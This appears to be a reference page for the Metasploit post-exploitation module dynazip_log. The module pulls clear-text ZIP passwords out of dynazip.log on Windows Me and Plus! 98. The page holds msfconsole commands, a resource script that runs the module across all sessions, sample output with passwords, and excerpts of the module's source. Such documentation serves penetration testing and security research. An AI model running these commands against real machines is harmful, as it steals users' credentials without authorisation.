Windows Gather DynaZIP Saved Password Extraction - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/dynazip_log metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Windows Gather DynaZIP Saved Password Extraction
Module: post/windows/gather/credentials/dynazip_log
Source code: modules/post/windows/gather/credentials/dynazip_log.rb
Disclosure date: 2001-03-27
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2001-0152

This module extracts clear text credentials from dynazip.log. The log file contains passwords used to encrypt compressed zip files in Microsoft Plus! 98 and Windows Me.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/dynazip_log

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/dynazip_log
msf post(dynazip_log) > show options
    ... show and set options ...
msf post(dynazip_log) > set SESSION session-id
msf post(dynazip_log) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/dynazip_log")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

This post-exploitation module extracts clear text credentials from dynazip.log.

The dynazip.log file is located in %WINDIR% and contains log entries generated during encryption of Compressed Folders (zip files) in Microsoft® Plus! 98 and Windows® Me. Each log entry contains detailed diagnostic information generated during the encryption process, including the zip file name and the password used to encrypt the zip file in clear text.

Microsoft released details of the vulnerability in Microsoft Security Bulletin MS01-019 rated as Critical. A patch which disabled use of the log file was also released; however the patch failed to clear the contents of the existing log file.

Microsoft® Plus! 98 and Windows® Me are no longer supported by Microsoft.

Verification Steps

  1. Start msfconsole
  2. Get meterpreter session
  3. Do: use post/windows/gather/credentials/dynazip_log
  4. Do: set SESSION <session id>
  5. Do: run
  6. You should be able to see the extracted credentials in the module output

Example Run

Default Output

  msf post(dynazip_log) > exploit 

  [+] Found DynaZip log file: C:\WINDOWS\dynazip.log
  [+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
  [+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
  [+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
  [+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'

  ZIP Passwords
  =============

  File Path                                   Password
  ---------                                   --------
  C:\WINDOWS\Desktop\earthbound.zip           fuzzy pickles
  C:\WINDOWS\Desktop\private.zip              priv8
  C:\WINDOWS\Desktop\secret.zip               my secret password!
  C:\WINDOWS\Desktop\thepasswordisaspace.zip   

  [*] Post module execution completed

Verbose Output

  msf post(dynazip_log) > set verbose true
  verbose => true
  msf post(dynazip_log) > exploit 

  [+] Found DynaZip log file: C:\WINDOWS\dynazip.log
  [*] Processing log file (6614 bytes)
  [*] Processing log entry for C:\WINDOWS\Desktop\secret.zip
  [+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
  [*] Processing log entry for C:\WINDOWS\Desktop\private.zip
  [+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
  [*] Processing log entry for C:\WINDOWS\Desktop\thepasswordisaspace.zip
  [+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
  [*] Processing log entry for C:\WINDOWS\Desktop\earthbound.zip
  [+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'
  [*] Processing log entry for C:\WINDOWS\Desktop\this file is not encrypted.zip
  [*] Did not find a password

  ZIP Passwords
  =============

  File Path                                   Password
  ---------                                   --------
  C:\WINDOWS\Desktop\earthbound.zip           fuzzy pickles
  C:\WINDOWS\Desktop\private.zip              priv8
  C:\WINDOWS\Desktop\secret.zip               my secret password!
  C:\WINDOWS\Desktop\thepasswordisaspace.zip   

  [*] Post module execution completed

Example Log Entry

An example dynazip.log log file entry is shown below:

  --- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17  17:01:46 ---
  Function:  5 
  lpszZIPFile: 0x00437538 
  C:\WINDOWS\Desktop\secret.zip
  lpszItemList: 0x0059e878 
  "secret.txt"
  lpMajorStatus: 0x00000000 
  lpMajorUserData: 0x00000000 
  lpMinorStatus: 0x00000000 
  lpMinorUserData: 0x00000000 
  dosifyFlag: 0 
  recurseFlag: 0 
  compFactor: 5 
  quietFlag: 1 
  pathForTempFlag: 0 
  lpszTempPath: 0x00000000 
  ???
  fixFlag: 0 
  fixHarderFlag: 0 
  includeVolumeFlag: 0 
  deleteOriginalFlag: 0 
  growExistingFlag: 0 
  noDirectoryNamesFlag: 0 
  convertLFtoCRLFFlag: 0 
  addCommentFlag: 0 
  lpszComment: 0x00000000 
  ???
  afterDateFlag: 0 
  lpszDate: 0x00000000 
  oldAsLatestFlag: 0 
  includeOnlyFollowingFlag: 0 
  lpszIncludeFollowing: 0x00000000 
  ???
  excludeFollowingFlag: 0 
  lpszExludeFollowing: 0x00000000 
  ???
  noDirectoryEntriesFlag: 0 
  includeSysHiddenFlag: 1 
  dontCompressTheseSuffixesFlag: 0 
  lpszStoreSuffixes: 0x00000000 
  ???
  encryptFlag: 1 
  lpszEncryptCode: 0x712185d4 
  my secret password!
  lpMessageDisplay: 0x7120ca22 
  lpMessageDisplayData: 0x00000000 
  wMultiVolControl: 0x0000 
  wZipSubOptions: 0x0000 
  lResv1: 0x00000000 
  lResv2: 0x00000000 
  lpszExtProgTitle: 0x00000000 
  ???
  lpRenameProc: 0x71203919 
  lpRenameUserData: 0x0059eb8a 
  lpMemBlock: 0x004e3a0c 
  lMemBlockSize: 6

Go back to menu.

Msfconsole Usage

Here is how the windows/gather/credentials/dynazip_log post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/dynazip_log

msf6 post(windows/gather/credentials/dynazip_log) > show info

       Name: Windows Gather DynaZIP Saved Password Extraction
     Module: post/windows/gather/credentials/dynazip_log
   Platform: Windows
       Arch: 
       Rank: Normal
  Disclosed: 2001-03-27

Provided by:
  bcoles <[email protected]>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts clear text credentials from dynazip.log. The 
  log file contains passwords used to encrypt compressed zip files in 
  Microsoft Plus! 98 and Windows Me.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2001-0152
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/MS01-019
  https://packetstormsecurity.com/files/24543
  https://support.microsoft.com/en-us/kb/265131

Module Options

This is a complete list of options available in the windows/gather/credentials/dynazip_log post exploitation module:

msf6 post(windows/gather/credentials/dynazip_log) > show options

Module options (post/windows/gather/credentials/dynazip_log):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options

Here is a complete list of advanced options supported by the windows/gather/credentials/dynazip_log post exploitation module:

msf6 post(windows/gather/credentials/dynazip_log) > show advanced

Module advanced options (post/windows/gather/credentials/dynazip_log):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the windows/gather/credentials/dynazip_log module can do:

msf6 post(windows/gather/credentials/dynazip_log) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the windows/gather/credentials/dynazip_log post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/dynazip_log) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<LOG_PATH> not found

Here is a relevant code snippet related to the "<LOG_PATH> not found" error message:

34:	    creds = []
35:	
36:	    log_path = "#{get_env("%WINDIR%")}\\dynazip.log"
37:	
38:	    unless file?(log_path)
39:	      print_error("#{log_path} not found")
40:	      return
41:	    end
42:	
43:	    print_good("Found DynaZip log file: #{log_path}")
44:

Log file is empty

Here is a relevant code snippet related to the "Log file is empty" error message:

43:	    print_good("Found DynaZip log file: #{log_path}")
44:	
45:	    begin
46:	      log_data = read_file(log_path)
47:	    rescue EOFError
48:	      print_error('Log file is empty')
49:	      return
50:	    end
51:	
52:	    vprint_status("Processing log file (#{log_data.length} bytes)")
53:

Did not find a password

Here is a relevant code snippet related to the "Did not find a password" error message:

68:	
69:	      # In the event that the user selected a blank encryption password
70:	      # the ZIP file is not encrypted, however an empty line is written
71:	      # to the log file.
72:	      if passwd.to_s.eql?('')
73:	        vprint_status('Did not find a password')
74:	        next
75:	      end
76:	
77:	      print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
78:	      creds << [zip_path, passwd]

No passwords were found in the log file

Here is a relevant code snippet related to the "No passwords were found in the log file" error message:

77:	      print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
78:	      creds << [zip_path, passwd]
79:	    end
80:	
81:	    if creds.empty?
82:	      print_error('No passwords were found in the log file')
83:	      return
84:	    end
85:	
86:	    table = Rex::Text::Table.new(
87:	      'Header'    => 'ZIP Passwords',

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • bcoles

Version

This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.